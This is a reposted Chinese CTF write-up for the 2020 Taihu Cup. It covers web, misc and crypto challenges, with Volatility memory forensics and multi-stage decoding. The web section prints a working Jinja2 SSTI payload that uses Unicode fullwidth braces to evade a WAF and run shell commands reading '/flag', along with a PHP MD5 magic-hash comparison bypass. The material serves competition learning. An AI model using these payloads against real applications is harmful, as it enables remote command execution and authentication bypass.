ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

太湖杯WriteUp

2020-11-16 14:32:30  阅读:468  来源: 互联网

标签:dump -- WriteUp 太湖 u54c9 2020 u96b8 23418


web

checkingame【已解决】

控制台执行

var game = new Game();
game.winning()

easyweb【已解决】

利用unicode编码规范化绕过waf,再加SSTI

payload:

﹛﹛config.__class__.__init__.__globals__['os'].popen('ls /').read()﹜﹜
﹛﹛config.__class__.__init__.__globals__['os'].popen('cat /flag').read()﹜﹜

https://www.anquanke.com/post/id/211363#h2-2

ezMD5【已解决】


$result = @auth($username,$password);
if (md5($username) == md5($result)  and $result !== $username){
echo "bingo : <b>$flag</b>";
}

数组报错

http://122.112.253.121:10032/robots.txt

auth.so

payload:

name=240610708&password=abcdabcdabcdabcdabcdabcdabcdabcdQNKCDZO&submit=%E7%99%BB%E5%BD%95

https://ctftime.org/writeup/11325

misc

memory【已解决】

flag{From_Mem_to_find_ans}

vol.py -f dump --profile=Win7SP1x86_23418 pslist
vol.py -f dump --profile=Win7SP1x86_23418 dlllist
上面的没发现什么
看一下文件,太多..
vol.py -f dump --profile=Win7SP1x86_23418 filescan
发现进程有浏览器,看一下历史记录
vol.py -f dump --profile=Win7SP1x86_23418 iehistory
发现这个:
Volatility Foundation Volatility Framework 2.6.1
**************************************************
Process: 2072 explorer.exe
Cache type "URL " at 0x1a45000
Record length: 0x100
Location: :2020110520201106: link3@file:///C:/Users/link3/Desktop/Untitled.png
Last modified: 2020-11-05 00:11:38 UTC+0000
Last accessed: 2020-11-04 16:11:39 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x0
去文件列表找对应的文件,然后提取
vol.py -f dump --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fdf6118 --name Untitled.png -D ./
得到flag

misc

给了一个word和加密的压缩包

word内容base64

Salted__x›€y RƒËM.ËJ˜uÞZҏóœÂ€ ppõé؇D´l{ÒEGªÜ#ÀøϚ(¶o¨Náì@E’ò‰?ä)ìàµtÚó;O“ïAeXéIÝw€ö’pÐÍãÐø»èKúX7v:;ï%S¬Ò¾ä…3–jôI„wÞÑÒ«v3$dÁKVlh¿°`¼µ9Í~ÂåÑ$6%äɄÿÚ5M‹˜õSÉÍòâDñû+0òö¬§Z€WӞÙi(¬“‚®§Pñ
ïÄógHÑ2þŒ$í²µL¿Þg›OKUŠ[mýÅ¾Ø -.ªæ_œâv9ùhF{¦ü
ހ²xs‡úñ¶€ÇT£º°a"º}ÌÕ+ì@K×w·ò–f19‚¥FPš—Ê®©cÕaI\¸qúi»PÀۃoèÙÄÈ9A óÀøirìØJS“ 	Ø]+^Ó_¼öýb>©ÉôX5™táeô¼úV°(ï%å½|X^IW§!¢îë‹.¤+(ÀãQB™R×LŸD^
Ñò·ž«îø¹2†^°ûm¶AhÛ$]ÙØGoY*6w"p©3Í)g‰¯ÿárpþ(ü1öƒS
àBKýâ\I$H)òÊ{®9åö¸Ù@¶-µâ`›Yaþ§çàñÈYýÉ+Í}’ ܎¬ç-ïøE¯Ô›Õepˆ„Ã[•íÍSþb¿È'H¤—s2ïAÞ®jòItO&ozzß©Î϶|ˆìQ‰å‰ä¦­9"L¬ß”]üBÜÑHVÃs´s‹¾y‹P“;¿÷åG-E‹äS·r偁Œ15u§ªvzóqp¬Î[q¾“NíÿC›)¤Yª6³—ùËqå¾q‰‡’gÅÅ#i,è¾Ú´»Í÷!œˆ™/¨Ýœ?­rä:fYîŒa0Ïô~]ÕïHk÷Ã?J¯t¢~9.N>XçnŒ°ú{B¡Geü‚í݆"¶šu#‹ùâ0}«ÂªÆ•Œ[‘÷çÒ
d¢üw±ÌG¬ÎgÁ³K½.i?y®‚CÚV°ˆƒ¼¡$
b›2x o1qgþ³ŒÜ폒ä“([»¿×gz3›º~Q%Ã.PUÐ_zžè¦èþ
Àq«E[/ª„*D
—Þ.­¹‘¼:ª³'´*îCØ´Dª¡†ÊË!P¶Všùqâí…RØø^

勾选隐藏文字

waoootu.epj,nv o
www.verymuch.net

解密得到

love and peaceee

刚刚base64解密的带Salted__, 大概率是rabbit加密

解密得到

LR2TMNLCGBOHKNDGGVRFY5JWGZTDAXDVMZTDCYK4OU4GCZRYLR2TSNTCHBOHKNJUMM4VY5JVGBSTOXDVHE3DIZC4OU2TIM3ELR2TQYLGHBOHKOJWGQYFY5JWGQ3DSXDVHE3GEOC4OU2TAZJXLR2TOZRTMROHKOBVME4VY5JVGRQTIXDVHAYDEOC4OU4GCZRYLR2TSNTCHBOHKNRRGY3VY5JVHA2WKXDVHAZDOMS4OU2WGMDBLR2TKNDDHFOHKODGMU3FY5JYMFSTMXDVG5QTOYK4OU3DENBQLR2TSNRUMROHKNRSGEYVY5JVMZTDKXDVHE3GEOC4OU3TSNJXLR2TQYLFGZOHKNLGMY2VY5JVGRRTSXDVHE3DIMC4OU2TMYRULR2TKNDDHFOHKNJWMM4VY5JUMZSWKXDVGU4TGN24OU4TMM3GLR2TMY3FGJOHKOBSG4ZFY5JYGM4GCXDVGVRGGMS4OU4GCZJWLR2TKOBVMVOHKNJUHEZFY5JYGM4GCXDVG43TGZK4OU3DEMJRLR2TKNDDHFOHKNRSGQYFY5JUMYYGMXDVHAYDKZK4OU4DKYJZLR2TSNTCHBOHKNRRGBSFY5JZGVRWIXDVGU2DGNS4OU3DENBQLR2TIZTFMVOHKNRWGJTFY5JYGI3TEXDVGY2DMOK4OU4GCMZWLR2TKNTCGROHKNJUMM4VY5JZHA2TQXDVGYYTAZC4OU2TIYZZLR2TKMZXGNOHKNDGMVSVY5JVGRRTSXDVG5QTOYK4OU4DOMLDLR2TSNRUGBOHKNJWMM4VY5JUMYYGMXDVGVTGMNK4OU2TIYZZLR2TMNBWHFOHKNJUMM4VY5JUMVQTMXDVHAZTQYK4OU2TIYZZLR2TONZTMVOHKNJUME2FY5JVHE4DEXDVHE4DKOC4OU2TSOBS

base32

\u65b0\u4f5b\u66f0\uff1a\u8af8\u96b8\u54c9\u50e7\u964d\u543d\u8af8\u9640\u6469\u96b8\u50e7\u7f3d\u85a9\u54a4\u8028\u8af8\u96b8\u6167\u585e\u8272\u5c0a\u54c9\u8fe6\u8ae6\u7a7a\u6240\u964d\u6211\u5ff5\u96b8\u7957\u8ae6\u5ff5\u54c9\u9640\u56b4\u54c9\u56c9\u4fee\u5937\u963f\u6ce2\u8272\u838a\u5bc2\u8ae6\u585e\u5492\u838a\u773e\u6211\u54c9\u6240\u4f0f\u805e\u85a9\u96b8\u610d\u95cd\u5436\u6240\u4fee\u662f\u8272\u6469\u8a36\u56b4\u54c9\u9858\u610d\u54c9\u5373\u4fee\u54c9\u7a7a\u871c\u9640\u56c9\u4f0f\u5ff5\u54c9\u6469\u54c9\u4ea6\u838a\u54c9\u773e\u54a4\u5982\u9858\u5982

unicode

与佛论禅

Live beautifully, dream passionately, love completely.

解压给的压缩包,看频谱图

flag{m1sc_1s_funny2333}

broken secret

crypto

Certificate Authority

或许相关:

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

http://showlinkroom.me/2020/01/21/CVE-2020-0601-Research/

标签:dump,--,WriteUp,太湖,u54c9,2020,u96b8,23418
来源: https://www.cnblogs.com/twosmi1e/p/13984911.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有